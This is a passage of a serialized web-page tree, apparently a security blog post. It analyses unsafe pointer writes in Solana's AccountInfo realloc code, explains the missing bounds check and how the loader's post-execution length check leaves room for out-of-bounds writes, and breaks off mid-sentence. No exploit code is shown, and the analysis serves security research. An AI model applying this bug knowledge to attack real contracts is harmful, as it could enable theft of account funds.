",{"type":24,"tag":188,"props":22848,"children":22851},{"href":22849,"rel":22850},"https://doc.rust-lang.org/std/primitive.slice.html#method.as_mut_ptr",[192],[22852],{"type":24,"tag":145,"props":22853,"children":22855},{"className":22854},[],[22856],{"type":30,"value":22857},"slice::as_mut_ptr()",{"type":30,"value":22859}," gives us that data pointer directly. So, this code computes a pointer to that serialized size field (8 bytes - the size of a ",{"type":24,"tag":145,"props":22861,"children":22863},{"className":22862},[],[22864],{"type":30,"value":14857},{"type":30,"value":22866}," - behind the data buffer), and then writes ",{"type":24,"tag":145,"props":22868,"children":22870},{"className":22869},[],[22871],{"type":30,"value":20516},{"type":30,"value":22873}," to it.",{"type":24,"tag":32,"props":22875,"children":22876},{},[22877,22879,22891,22893,22899],{"type":30,"value":22878},"This is reasonable... ",{"type":24,"tag":5422,"props":22880,"children":22881},{},[22882,22884,22889],{"type":30,"value":22883},"as long as the ",{"type":24,"tag":145,"props":22885,"children":22887},{"className":22886},[],[22888],{"type":30,"value":10528},{"type":30,"value":22890}," actually came from the serialized buffer",{"type":30,"value":22892},". We'll come back to this ",{"type":24,"tag":188,"props":22894,"children":22896},{"href":22895},"#Not-contracts",[22897],{"type":30,"value":22898},"later",{"type":30,"value":206},{"type":24,"tag":32,"props":22901,"children":22902},{},[22903,22905,22910],{"type":30,"value":22904},"At this point we've updated the serialized buffer, so at exit the runtime will understand that the size of the account's data buffer has changed. However, we haven't dealt with the Rust side yet. Slices have a length, and we haven't dealt with the ",{"type":24,"tag":145,"props":22906,"children":22908},{"className":22907},[],[22909],{"type":30,"value":22251},{"type":30,"value":22911}," slice that is our view into the data from the Rust world. So let's look at the next chunk:",{"type":24,"tag":291,"props":22913,"children":22915},{"className":9818,"code":22914,"language":9817,"meta":7,"style":7},"// Then set the new length in the local slice\nlet ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n*ptr = new_len as u64;\n",[22916],{"type":24,"tag":145,"props":22917,"children":22918},{"__ignoreMap":7},[22919,22927,23054],{"type":24,"tag":301,"props":22920,"children":22921},{"class":303,"line":304},[22922],{"type":24,"tag":301,"props":22923,"children":22924},{"style":1062},[22925],{"type":30,"value":22926},"// Then set the new length in the local slice\n",{"type":24,"tag":301,"props":22928,"children":22929},{"class":303,"line":320},[22930,22934,22938,22942,22946,22950,22954,22958,22962,22966,22970,22974,22978,22982,22986,22990,22994,22998,23002,23006,23010,23014,23018,23022,23026,23030,23034,23038,23042,23046,23050],{"type":24,"tag":301,"props":22931,"children":22932},{"style":348},[22933],{"type":30,"value":3258},{"type":24,"tag":301,"props":22935,"children":22936},{"style":369},[22937],{"type":30,"value":20650},{"type":24,"tag":301,"props":22939,"children":22940},{"style":385},[22941],{"type":30,"value":2537},{"type":24,"tag":301,"props":22943,"children":22944},{"style":385},[22945],{"type":30,"value":991},{"type":24,"tag":301,"props":22947,"children":22948},{"style":348},[22949],{"type":30,"value":10550},{"type":24,"tag":301,"props":22951,"children":22952},{"style":385},[22953],{"type":30,"value":431},{"type":24,"tag":301,"props":22955,"children":22956},{"style":359},[22957],{"type":30,"value":20809},{"type":24,"tag":301,"props":22959,"children":22960},{"style":348},[22961],{"type":30,"value":20507},{"type":24,"tag":301,"props":22963,"children":22964},{"style":385},[22965],{"type":30,"value":206},{"type":24,"tag":301,"props":22967,"children":22968},{"style":359},[22969],{"type":30,"value":10528},{"type":24,"tag":301,"props":22971,"children":22972},{"style":385},[22973],{"type":30,"value":206},{"type":24,"tag":301,"props":22975,"children":22976},{"style":314},[22977],{"type":30,"value":20830},{"type":24,"tag":301,"props":22979,"children":22980},{"style":359},[22981],{"type":30,"value":20835},{"type":24,"tag":301,"props":22983,"children":22984},{"style":348},[22985],{"type":30,"value":15654},{"type":24,"tag":301,"props":22987,"children":22988},{"style":385},[22989],{"type":30,"value":431},{"type":24,"tag":301,"props":22991,"children":22992},{"style":348},[22993],{"type":30,"value":16460},{"type":24,"tag":301,"props":22995,"children":22996},{"style":10246},[22997],{"type":30,"value":12680},{"type":24,"tag":301,"props":22999,"children":23000},{"style":359},[23001],{"type":30,"value":9961},{"type":24,"tag":301,"props":23003,"children":23004},{"style":385},[23005],{"type":30,"value":206},{"type":24,"tag":301,"props":23007,"children":23008},{"style":314},[23009],{"type":30,"value":20694},{"type":24,"tag":301,"props":23011,"children":23012},{"style":359},[23013],{"type":30,"value":362},{"type":24,"tag":301,"props":23015,"children":23016},{"style":466},[23017],{"type":30,"value":546},{"type":24,"tag":301,"props":23019,"children":23020},{"style":359},[23021],{"type":30,"value":911},{"type":24,"tag":301,"props":23023,"children":23024},{"style":348},[23025],{"type":30,"value":15654},{"type":24,"tag":301,"props":23027,"children":23028},{"style":10246},[23029],{"type":30,"value":12680},{"type":24,"tag":301,"props":23031,"children":23032},{"style":359},[23033],{"type":30,"value":911},{"type":24,"tag":301,"props":23035,"children":23036},{"style":348},[23037],{"type":30,"value":15654},{"type":24,"tag":301,"props":23039,"children":23040},{"style":385},[23041],{"type":30,"value":431},{"type":24,"tag":301,"props":23043,"children":23044},{"style":348},[23045],{"type":30,"value":10550},{"type":24,"tag":301,"props":23047,"children":23048},{"style":10246},[23049],{"type":30,"value":12680},{"type":24,"tag":301,"props":23051,"children":23052},{"style":359},[23053],{"type":30,"value":589},{"type":24,"tag":301,"props":23055,"children":23056},{"class":303,"line":335},[23057,23061,23065,23069,23073,23077,23081],{"type":24,"tag":301,"props":23058,"children":23059},{"style":385},[23060],{"type":30,"value":772},{"type":24,"tag":301,"props":23062,"children":23063},{"style":369},[23064],{"type":30,"value":3137},{"type":24,"tag":301,"props":23066,"children":23067},{"style":385},[23068],{"type":30,"value":2537},{"type":24,"tag":301,"props":23070,"children":23071},{"style":369},[23072],{"type":30,"value":20750},{"type":24,"tag":301,"props":23074,"children":23075},{"style":348},[23076],{"type":30,"value":15640},{"type":24,"tag":301,"props":23078,"children":23079},{"style":10246},[23080],{"type":30,"value":12680},{"type":24,"tag":301,"props":23082,"children":23083},{"style":359},[23084],{"type":30,"value":492},{"type":24,"tag":32,"props":23086,"children":23087},{},[23088,23090,23096,23098,23109,23111,23117,23119,23125,23127,23132,23134,23139,23141,23151,23152,23159,23160,23167,23174,23176,23182,23184,23190,23192,23197,23199,23204,23206,23212,23214,23219],{"type":30,"value":23089},"That ",{"type":24,"tag":145,"props":23091,"children":23093},{"className":23092},[],[23094],{"type":30,"value":23095},"as_ptr()",{"type":30,"value":23097}," call is ",{"type":24,"tag":188,"props":23099,"children":23102},{"href":23100,"rel":23101},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.as_ptr",[192],[23103],{"type":24,"tag":145,"props":23104,"children":23106},{"className":23105},[],[23107],{"type":30,"value":23108},"RefCell::as_ptr()",{"type":30,"value":23110}," due to the ",{"type":24,"tag":145,"props":23112,"children":23114},{"className":23113},[],[23115],{"type":30,"value":23116},"Deref",{"type":30,"value":23118}," impl on ",{"type":24,"tag":145,"props":23120,"children":23122},{"className":23121},[],[23123],{"type":30,"value":23124},"Rc",{"type":30,"value":23126}," (remember also that ",{"type":24,"tag":145,"props":23128,"children":23130},{"className":23129},[],[23131],{"type":30,"value":22292},{"type":30,"value":23133}," itself doesn't behave like a reference, you need to actually ",{"type":24,"tag":5422,"props":23135,"children":23136},{},[23137],{"type":30,"value":23138},"get",{"type":30,"value":23140}," one through ",{"type":24,"tag":188,"props":23142,"children":23145},{"href":23143,"rel":23144},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.borrow",[192],[23146],{"type":24,"tag":145,"props":23147,"children":23149},{"className":23148},[],[23150],{"type":30,"value":15614},{"type":30,"value":13277},{"type":24,"tag":188,"props":23153,"children":23156},{"href":23154,"rel":23155},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.borrow_mut",[192],[23157],{"type":30,"value":23158},"and",{"type":30,"value":13277},{"type":24,"tag":188,"props":23161,"children":23164},{"href":23162,"rel":23163},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.try_borrow",[192],[23165],{"type":30,"value":23166},"frie",{"type":24,"tag":188,"props":23168,"children":23171},{"href":23169,"rel":23170},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.try_borrow_mut",[192],[23172],{"type":30,"value":23173},"nds",{"type":30,"value":23175},"). So from ",{"type":24,"tag":145,"props":23177,"children":23179},{"className":23178},[],[23180],{"type":30,"value":23181},"RefCell::\u003C&mut [u8]>::as_mut()",{"type":30,"value":23183}," we get a ",{"type":24,"tag":145,"props":23185,"children":23187},{"className":23186},[],[23188],{"type":30,"value":23189},"*mut &mut [u8]",{"type":30,"value":23191}," - a ",{"type":24,"tag":5422,"props":23193,"children":23194},{},[23195],{"type":30,"value":23196},"pointer",{"type":30,"value":23198}," to the ",{"type":24,"tag":5422,"props":23200,"children":23201},{},[23202],{"type":30,"value":23203},"slice reference",{"type":30,"value":23205},". From here, we turn the pointer into a ",{"type":24,"tag":145,"props":23207,"children":23209},{"className":23208},[],[23210],{"type":30,"value":23211},"*const u64",{"type":30,"value":23213}," pointer and then offset by 1 ",{"type":24,"tag":145,"props":23215,"children":23217},{"className":23216},[],[23218],{"type":30,"value":14857},{"type":30,"value":23220}," (so 8 bytes). Finally, we switch the pointer back to being mutable, and write the new length to it.",{"type":24,"tag":32,"props":23222,"children":23223},{},[23224,23226,23231,23233,23238,23240,23245,23247,23252,23254,23260],{"type":30,"value":23225},"Now, if you're sitting here thinking that this is unnecessarily convoluted and confusing, you'd be right! But we'll get back to that ",{"type":24,"tag":188,"props":23227,"children":23229},{"href":23228},"#Towards-safer-unsafe",[23230],{"type":30,"value":22898},{"type":30,"value":23232}," too, I promise. In summary, we're writing the new length as a ",{"type":24,"tag":145,"props":23234,"children":23236},{"className":23235},[],[23237],{"type":30,"value":14857},{"type":30,"value":23239}," to the region starting 8 bytes from the start of the slice ",{"type":24,"tag":5422,"props":23241,"children":23242},{},[23243],{"type":30,"value":23244},"reference",{"type":30,"value":23246}," (the ",{"type":24,"tag":145,"props":23248,"children":23250},{"className":23249},[],[23251],{"type":30,"value":22251},{"type":30,"value":23253},").So, what does ",{"type":24,"tag":145,"props":23255,"children":23257},{"className":23256},[],[23258],{"type":30,"value":23259},"&[T]",{"type":30,"value":23261}," look like in Rust?",{"type":24,"tag":32,"props":23263,"children":23264},{},[23265,23267,23274,23276,23289,23291,23297],{"type":30,"value":23266},"According to ",{"type":24,"tag":188,"props":23268,"children":23271},{"href":23269,"rel":23270},"https://doc.rust-lang.org/reference/type-layout.html#pointers-and-references-layout",[192],[23272],{"type":30,"value":23273},"the reference",{"type":30,"value":23275},", it's completely undefined - there are no guarantees made in the reference, and ",{"type":24,"tag":188,"props":23277,"children":23280},{"href":23278,"rel":23279},"https://doc.rust-lang.org/reference/type-layout.html",[192],[23281,23283,23287],{"type":30,"value":23282},"\"Type layout can be changed with each compilation. ",{"type":24,"tag":301,"props":23284,"children":23285},{},[23286],{"type":30,"value":4054},{"type":30,"value":23288}," we only document what is guaranteed today\"",{"type":30,"value":23290},". But it seems like those pesky language specs aren't stopping Solana developers. In current ",{"type":24,"tag":145,"props":23292,"children":23294},{"className":23293},[],[23295],{"type":30,"value":23296},"rustc",{"type":30,"value":23298},", the layout is a data pointer followed by the size; essentially the same as:",{"type":24,"tag":291,"props":23300,"children":23302},{"className":295,"code":23301,"language":294,"meta":7,"style":7},"// C language\nstruct slice_ref {\n void* ptr;\n size_t len;\n};\n",[23303],{"type":24,"tag":145,"props":23304,"children":23305},{"__ignoreMap":7},[23306,23314,23326,23341,23353],{"type":24,"tag":301,"props":23307,"children":23308},{"class":303,"line":304},[23309],{"type":24,"tag":301,"props":23310,"children":23311},{"style":1062},[23312],{"type":30,"value":23313},"// C language\n",{"type":24,"tag":301,"props":23315,"children":23316},{"class":303,"line":320},[23317,23321],{"type":24,"tag":301,"props":23318,"children":23319},{"style":348},[23320],{"type":30,"value":3010},{"type":24,"tag":301,"props":23322,"children":23323},{"style":359},[23324],{"type":30,"value":23325}," slice_ref {\n",{"type":24,"tag":301,"props":23327,"children":23328},{"class":303,"line":335},[23329,23333,23337],{"type":24,"tag":301,"props":23330,"children":23331},{"style":348},[23332],{"type":30,"value":6092},{"type":24,"tag":301,"props":23334,"children":23335},{"style":385},[23336],{"type":30,"value":772},{"type":24,"tag":301,"props":23338,"children":23339},{"style":359},[23340],{"type":30,"value":3052},{"type":24,"tag":301,"props":23342,"children":23343},{"class":303,"line":344},[23344,23348],{"type":24,"tag":301,"props":23345,"children":23346},{"style":348},[23347],{"type":30,"value":3093},{"type":24,"tag":301,"props":23349,"children":23350},{"style":359},[23351],{"type":30,"value":23352}," len;\n",{"type":24,"tag":301,"props":23354,"children":23355},{"class":303,"line":401},[23356],{"type":24,"tag":301,"props":23357,"children":23358},{"style":359},[23359],{"type":30,"value":3118},{"type":24,"tag":32,"props":23361,"children":23362},{},[23363],{"type":30,"value":23364},"So at the end of the day we find out that the code is simply writing over the length field in the slice reference. Let's step back a moment and take a look at all the assumptions we made along the way while executing these 2 lines (really only one of importance!):",{"type":24,"tag":6246,"props":23366,"children":23367},{},[23368,23373,23391],{"type":24,"tag":2659,"props":23369,"children":23370},{},[23371],{"type":30,"value":23372},"Slices are laid out in the precise manner described",{"type":24,"tag":2659,"props":23374,"children":23375},{},[23376,23378,23384,23386],{"type":30,"value":23377},"Pointers and ",{"type":24,"tag":145,"props":23379,"children":23381},{"className":23380},[],[23382],{"type":30,"value":23383},"usize",{"type":30,"value":23385}," are the same width as ",{"type":24,"tag":145,"props":23387,"children":23389},{"className":23388},[],[23390],{"type":30,"value":14857},{"type":24,"tag":2659,"props":23392,"children":23393},{},[23394,23395,23400],{"type":30,"value":8079},{"type":24,"tag":145,"props":23396,"children":23398},{"className":23397},[],[23399],{"type":30,"value":22292},{"type":30,"value":23401}," was not borrowed (i.e. we didn't just mutate it while someone else has a reference to its contents)",{"type":24,"tag":32,"props":23403,"children":23404},{},[23405,23407,23412,23414,23420,23422,23427,23429,23435,23437,23442,23444,23454],{"type":30,"value":23406},"Assumption #2 is ",{"type":24,"tag":5422,"props":23408,"children":23409},{},[23410],{"type":30,"value":23411},"probably",{"type":30,"value":23413}," fine when we only care about targeting Solana's bytecode machine, but still not a particularly safe assumption to make in case some change happens on the toolchain. And assumption #3 turns out to be a non-issue since we had just done a ",{"type":24,"tag":145,"props":23415,"children":23417},{"className":23416},[],[23418],{"type":30,"value":23419},"borrow_mut",{"type":30,"value":23421}," of the ",{"type":24,"tag":145,"props":23423,"children":23425},{"className":23424},[],[23426],{"type":30,"value":22292},{"type":30,"value":23428}," (through ",{"type":24,"tag":145,"props":23430,"children":23432},{"className":23431},[],[23433],{"type":30,"value":23434},"AccountInfo::try_borrow_mut_data()",{"type":30,"value":23436},"), and ",{"type":24,"tag":145,"props":23438,"children":23440},{"className":23439},[],[23441],{"type":30,"value":22292},{"type":30,"value":23443}," is not usable between multiple threads",{"type":24,"tag":22262,"props":23445,"children":23446},{},[23447],{"type":24,"tag":188,"props":23448,"children":23452},{"href":23449,"ariaDescribedBy":23450,"dataFootnoteRef":7,"id":23451},"#user-content-fn-sendsync",[22269],"user-content-fnref-sendsync",[23453],{"type":30,"value":1503},{"type":30,"value":23455},", so we already have exclusive access.",{"type":24,"tag":32,"props":23457,"children":23458},{},[23459,23461,23465],{"type":30,"value":23460},"A few more ",{"type":24,"tag":5422,"props":23462,"children":23463},{},[23464],{"type":30,"value":13925},{"type":30,"value":23466}," things of note, that could have gone badly but didn't:",{"type":24,"tag":2655,"props":23468,"children":23469},{},[23470,23512],{"type":24,"tag":2659,"props":23471,"children":23472},{},[23473,23475,23481,23483,23488,23490,23495,23497,23502,23504,23510],{"type":30,"value":23474},"By reborrowing the pointer (the ",{"type":24,"tag":145,"props":23476,"children":23478},{"className":23477},[],[23479],{"type":30,"value":23480},"&mut *(\u003Cvalue of type *mut u64>)",{"type":30,"value":23482},"), we've created a reference with an ",{"type":24,"tag":5422,"props":23484,"children":23485},{},[23486],{"type":30,"value":23487},"unbounded lifetime",{"type":30,"value":23489},". Rust is free to infer ",{"type":24,"tag":5422,"props":23491,"children":23492},{},[23493],{"type":30,"value":23494},"any",{"type":30,"value":23496}," lifetime for ",{"type":24,"tag":145,"props":23498,"children":23500},{"className":23499},[],[23501],{"type":30,"value":3137},{"type":30,"value":23503}," (including ",{"type":24,"tag":145,"props":23505,"children":23507},{"className":23506},[],[23508],{"type":30,"value":23509},"'static",{"type":30,"value":23511},"); thankfully it's only used in the next statement and never has a chance to escape.",{"type":24,"tag":2659,"props":23513,"children":23514},{},[23515,23517,23523,23525,23530,23532,23537,23539,23544,23546,23551,23553,23558,23560,23565,23567,23573,23575,23580,23582,23587,23589,23594,23596,23601,23603,23608],{"type":30,"value":23516},"Going back to the first statement when we were modifying the data buffer, it turns out we have another lifetime problem: we created a mutable pointer to the data from the ",{"type":24,"tag":145,"props":23518,"children":23520},{"className":23519},[],[23521],{"type":30,"value":23522},"RefMut",{"type":30,"value":23524}," returned from ",{"type":24,"tag":145,"props":23526,"children":23528},{"className":23527},[],[23529],{"type":30,"value":20667},{"type":30,"value":23531},", but the ",{"type":24,"tag":145,"props":23533,"children":23535},{"className":23534},[],[23536],{"type":30,"value":23522},{"type":30,"value":23538}," is dropped at the end of the statement. So, we now have in ",{"type":24,"tag":145,"props":23540,"children":23542},{"className":23541},[],[23543],{"type":30,"value":3137},{"type":30,"value":23545}," a ",{"type":24,"tag":5422,"props":23547,"children":23548},{},[23549],{"type":30,"value":23550},"mutable",{"type":30,"value":23552}," pointer to the ",{"type":24,"tag":145,"props":23554,"children":23556},{"className":23555},[],[23557],{"type":30,"value":22292},{"type":30,"value":23559},"'s data, but the ",{"type":24,"tag":145,"props":23561,"children":23563},{"className":23562},[],[23564],{"type":30,"value":22292},{"type":30,"value":23566}," thinks that we're done with our borrow. If we happened to be in a multithreaded scenario with something like a ",{"type":24,"tag":145,"props":23568,"children":23570},{"className":23569},[],[23571],{"type":30,"value":23572},"Mutex",{"type":30,"value":23574}," instead of a ",{"type":24,"tag":145,"props":23576,"children":23578},{"className":23577},[],[23579],{"type":30,"value":22292},{"type":30,"value":23581}," (but with otherwise semantically identical code), then a different thread could attempt to borrow between creating ",{"type":24,"tag":145,"props":23583,"children":23585},{"className":23584},[],[23586],{"type":30,"value":3137},{"type":30,"value":23588}," and writing to it ",{"type":24,"tag":5422,"props":23590,"children":23591},{},[23592],{"type":30,"value":23593},"and succeed",{"type":30,"value":23595},", resulting in us writing while another reference is alive. However, since ",{"type":24,"tag":145,"props":23597,"children":23599},{"className":23598},[],[23600],{"type":30,"value":3137},{"type":30,"value":23602}," is behind the actual data and thus the region it points to is inaccessible through the ",{"type":24,"tag":145,"props":23604,"children":23606},{"className":23605},[],[23607],{"type":30,"value":10528},{"type":30,"value":23609}," slice, this is still not a problem. I just wanted to highlight how easy it is to mess up borrowing and lifetimes when writing unsafe code.",{"type":24,"tag":32,"props":23611,"children":23612},{},[23613,23615,23620],{"type":30,"value":23614},"Ok, now that we've understood what the code is ",{"type":24,"tag":5422,"props":23616,"children":23617},{},[23618],{"type":30,"value":23619},"trying",{"type":30,"value":23621}," to do, let's try to break it, shall we?",{"type":24,"tag":43,"props":23623,"children":23625},{"id":23624},"what-can-go-wrong",[23626],{"type":30,"value":23627},"What can go wrong?",{"type":24,"tag":80,"props":23629,"children":23631},{"id":23630},"contracts",[23632],{"type":30,"value":23633},"Contracts",{"type":24,"tag":32,"props":23635,"children":23636},{},[23637,23639,23644,23646,23651,23653,23658,23660,23665],{"type":30,"value":23638},"Again, it's quite conspicuous that there's no bounds check whatsoever, and additionally, we notice that at no point did we actually touch the data pointer of the slice reference when ",{"type":24,"tag":145,"props":23640,"children":23642},{"className":23641},[],[23643],{"type":30,"value":20432},{"type":30,"value":23645},"'ing. In other words, when we realloc, all we do is change some size fields, no allocation is happening. So, if we ",{"type":24,"tag":145,"props":23647,"children":23649},{"className":23648},[],[23650],{"type":30,"value":20432},{"type":30,"value":23652}," to some large size, past the end of the buffer of roughly ",{"type":24,"tag":145,"props":23654,"children":23656},{"className":23655},[],[23657],{"type":30,"value":22083},{"type":30,"value":23659}," bytes in the serialized buffer from the BPF loader, then we've got free out-of-bounds memory write! Using the ",{"type":24,"tag":145,"props":23661,"children":23663},{"className":23662},[],[23664],{"type":30,"value":10528},{"type":30,"value":23666}," slice, we can write to anything \"after\" our account's data in memory. Other accounts' data are stored adjacent in memory, so it'd be pretty easy to modify the data or lamports. And remember, sizes and indices are unsigned, so what's \"behind\" our account in memory is actually just very far \"after\" our account - the address will wrap around the end of the address space.",{"type":24,"tag":32,"props":23668,"children":23669},{},[23670,23672,23679],{"type":30,"value":23671},"There is ",{"type":24,"tag":188,"props":23673,"children":23676},{"href":23674,"rel":23675},"https://github.com/solana-labs/solana/blob/94685e1222b3289859a447d62fadea20898241e0/programs/bpf_loader/src/serialization.rs#L324-L328",[192],[23677],{"type":30,"value":23678},"a check",{"type":30,"value":23680}," by the BPF loader, however, and it boils down to:",{"type":24,"tag":291,"props":23682,"children":23684},{"className":9818,"code":23683,"language":9817,"meta":7,"style":7},"if post_len.saturating_sub(*pre_len) > MAX_PERMITTED_DATA_INCREASE\n || post_len > MAX_PERMITTED_DATA_LENGTH as usize\n{\n return Err(InstructionError::InvalidRealloc);\n}\n",[23685],{"type":24,"tag":145,"props":23686,"children":23687},{"__ignoreMap":7},[23688,23726,23756,23763,23795],{"type":24,"tag":301,"props":23689,"children":23690},{"class":303,"line":304},[23691,23695,23700,23704,23708,23712,23716,23721],{"type":24,"tag":301,"props":23692,"children":23693},{"style":308},[23694],{"type":30,"value":22368},{"type":24,"tag":301,"props":23696,"children":23697},{"style":369},[23698],{"type":30,"value":23699}," post_len",{"type":24,"tag":301,"props":23701,"children":23702},{"style":385},[23703],{"type":30,"value":206},{"type":24,"tag":301,"props":23705,"children":23706},{"style":314},[23707],{"type":30,"value":21084},{"type":24,"tag":301,"props":23709,"children":23710},{"style":359},[23711],{"type":30,"value":362},{"type":24,"tag":301,"props":23713,"children":23714},{"style":385},[23715],{"type":30,"value":772},{"type":24,"tag":301,"props":23717,"children":23718},{"style":369},[23719],{"type":30,"value":23720},"pre_len",{"type":24,"tag":301,"props":23722,"children":23723},{"style":359},[23724],{"type":30,"value":23725},") > MAX_PERMITTED_DATA_INCREASE\n",{"type":24,"tag":301,"props":23727,"children":23728},{"class":303,"line":320},[23729,23734,23738,23742,23747,23751],{"type":24,"tag":301,"props":23730,"children":23731},{"style":385},[23732],{"type":30,"value":23733}," ||",{"type":24,"tag":301,"props":23735,"children":23736},{"style":369},[23737],{"type":30,"value":23699},{"type":24,"tag":301,"props":23739,"children":23740},{"style":385},[23741],{"type":30,"value":20986},{"type":24,"tag":301,"props":23743,"children":23744},{"style":359},[23745],{"type":30,"value":23746}," MAX_PERMITTED_DATA_LENGTH ",{"type":24,"tag":301,"props":23748,"children":23749},{"style":348},[23750],{"type":30,"value":15654},{"type":24,"tag":301,"props":23752,"children":23753},{"style":10246},[23754],{"type":30,"value":23755}," usize\n",{"type":24,"tag":301,"props":23757,"children":23758},{"class":303,"line":335},[23759],{"type":24,"tag":301,"props":23760,"children":23761},{"style":359},[23762],{"type":30,"value":799},{"type":24,"tag":301,"props":23764,"children":23765},{"class":303,"line":344},[23766,23770,23774,23778,23782,23786,23791],{"type":24,"tag":301,"props":23767,"children":23768},{"style":308},[23769],{"type":30,"value":680},{"type":24,"tag":301,"props":23771,"children":23772},{"style":10246},[23773],{"type":30,"value":22535},{"type":24,"tag":301,"props":23775,"children":23776},{"style":359},[23777],{"type":30,"value":362},{"type":24,"tag":301,"props":23779,"children":23780},{"style":10246},[23781],{"type":30,"value":22544},{"type":24,"tag":301,"props":23783,"children":23784},{"style":385},[23785],{"type":30,"value":10308},{"type":24,"tag":301,"props":23787,"children":23788},{"style":10246},[23789],{"type":30,"value":23790},"InvalidRealloc",{"type":24,"tag":301,"props":23792,"children":23793},{"style":359},[23794],{"type":30,"value":589},{"type":24,"tag":301,"props":23796,"children":23797},{"class":303,"line":401},[23798],{"type":24,"tag":301,"props":23799,"children":23800},{"style":359},[23801],{"type":30,"value":698},{"type":24,"tag":32,"props":23803,"children":23804},{},[23805,23807,23812,23814,23819],{"type":30,"value":23806},"But, like the other checks performed by the loader, this check only runs after the contract ",{"type":24,"tag":5422,"props":23808,"children":23809},{},[23810],{"type":30,"value":23811},"finishes",{"type":30,"value":23813}," execution. ",{"type":24,"tag":5422,"props":23815,"children":23816},{},[23817],{"type":30,"value":23818},"During",{"type":30,"value":23820}," execution, the contract is free to make whatever modifications to memory that it wants, since Solana's eBPF machine doesn't hook memory accesses in any way.",{"type":24,"tag":32,"props":23822,"children":23823},{},[23824,23826,23831,23833,23838,23840,23847],{"type":30,"value":23825},"The end result is that in order to successfully exploit this bug, an attacker needs a way to change the length back to something valid before the program exits. However, with potentially ",{"type":24,"tag":5422,"props":23827,"children":23828},{},[23829],{"type":30,"value":23830},"arbitrary",{"type":30,"value":23832}," memory access through a mistakenly-",{"type":24,"tag":145,"props":23834,"children":23836},{"className":23835},[],[23837],{"type":30,"value":20432},{"type":30,"value":23839},"'d account, this falls in the relm of some ",{"type":24,"tag":188,"props":23841,"children":23844},{"href":23842,"rel":23843},"https://en.wikipedia.org/wiki/Buffer_overflow",[192],[23845],{"type":30,"value":23846},"old-school pwning",{"type":30,"value":23848}," - even if we can't use the out-of-bounds access directly, there's plenty of pointers in memory that could be of use.",{"type":24,"tag":80,"props":23850,"children":23852},{"id":23851},"not-contracts",[23853],{"type":30,"value":23854},"Not-contracts?",{"type":24,"tag":32,"props":23856,"children":23857},{},[23858,23860,23865,23867,23877,23879,23891,23893,23900,23902,23907,23909,23914,23916,23929,23931,23936,23938,23943],{"type":30,"value":23859},"Remember when we said that all this code makes sense ",{"type":24,"tag":5422,"props":23861,"children":23862},{},[23863],{"type":30,"value":23864},"if the data points to the BPF loader's serialized buffer",{"type":30,"value":23866},"? Well unfortunately for us, there's nothing enforcing that; all the fields on ",{"type":24,"tag":188,"props":23868,"children":23871},{"href":23869,"rel":23870},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/struct.AccountInfo.html",[192],[23872],{"type":24,"tag":145,"props":23873,"children":23875},{"className":23874},[],[23876],{"type":30,"value":21729},{"type":30,"value":23878}," are public, and so is its ",{"type":24,"tag":188,"props":23880,"children":23883},{"href":23881,"rel":23882},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/struct.AccountInfo.html#method.new",[192],[23884,23889],{"type":24,"tag":145,"props":23885,"children":23887},{"className":23886},[],[23888],{"type":30,"value":21913},{"type":30,"value":23890}," method",{"type":30,"value":23892}," (which is ",{"type":24,"tag":188,"props":23894,"children":23897},{"href":23895,"rel":23896},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#160-180",[192],[23898],{"type":30,"value":23899},"nothing more than a thin wrapper around just creating the struct literal yourself",{"type":30,"value":23901},"). The ",{"type":24,"tag":145,"props":23903,"children":23905},{"className":23904},[],[23906],{"type":30,"value":20432},{"type":30,"value":23908}," code critically assumes that the memory 8 bytes behind the data buffer is the data's length and that we can write to it however we want when realloc'ing. So, clearly if we were to create an ",{"type":24,"tag":145,"props":23910,"children":23912},{"className":23911},[],[23913],{"type":30,"value":21729},{"type":30,"value":23915}," ourselves - potentially through the ",{"type":24,"tag":188,"props":23917,"children":23920},{"href":23918,"rel":23919},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/trait.Account.html",[192],[23921,23927],{"type":24,"tag":145,"props":23922,"children":23924},{"className":23923},[],[23925],{"type":30,"value":23926},"Account",{"type":30,"value":23928}," trait",{"type":30,"value":23930},", which is hardly documented at all and makes ",{"type":24,"tag":5422,"props":23932,"children":23933},{},[23934],{"type":30,"value":23935},"no",{"type":30,"value":23937}," mention of any prerequisites about the nature of the references that need to be returned - we'd run in to problems from pretty much any practical way we'd allocate the ",{"type":24,"tag":145,"props":23939,"children":23941},{"className":23940},[],[23942],{"type":30,"value":10528},{"type":30,"value":23944}," buffer.",{"type":24,"tag":32,"props":23946,"children":23947},{},[23948,23950,23961,23963,23969,23971,23977,23979,23992,23994,23999,24001,24006,24007,24012,24014,24019,24021,24026,24028,24033],{"type":30,"value":23949},"One long arm of this is ",{"type":24,"tag":188,"props":23951,"children":23954},{"href":23952,"rel":23953},"https://docs.rs/solana-sdk/1.10.28/solana_sdk/account/struct.Account.html",[192],[23955],{"type":24,"tag":145,"props":23956,"children":23958},{"className":23957},[],[23959],{"type":30,"value":23960},"solana_sdk::account::Account",{"type":30,"value":23962}," - in the client SDK. It holds an account's data in a ",{"type":24,"tag":145,"props":23964,"children":23966},{"className":23965},[],[23967],{"type":30,"value":23968},"Vec\u003Cu8>",{"type":30,"value":23970},", and it implements ",{"type":24,"tag":145,"props":23972,"children":23974},{"className":23973},[],[23975],{"type":30,"value":23976},"solana_program::account_info::Account",{"type":30,"value":23978}," (the trait from earlier) - by ",{"type":24,"tag":188,"props":23980,"children":23983},{"href":23981,"rel":23982},"https://docs.rs/solana-sdk/1.10.28/src/solana_sdk/account.rs.html#661-669",[192],[23984,23986],{"type":30,"value":23985},"returning a reference to the contents of that ",{"type":24,"tag":145,"props":23987,"children":23989},{"className":23988},[],[23990],{"type":30,"value":23991},"Vec",{"type":30,"value":23993},". So, ",{"type":24,"tag":145,"props":23995,"children":23997},{"className":23996},[],[23998],{"type":30,"value":20432},{"type":30,"value":24000}," writes the size into the 8 bytes right before 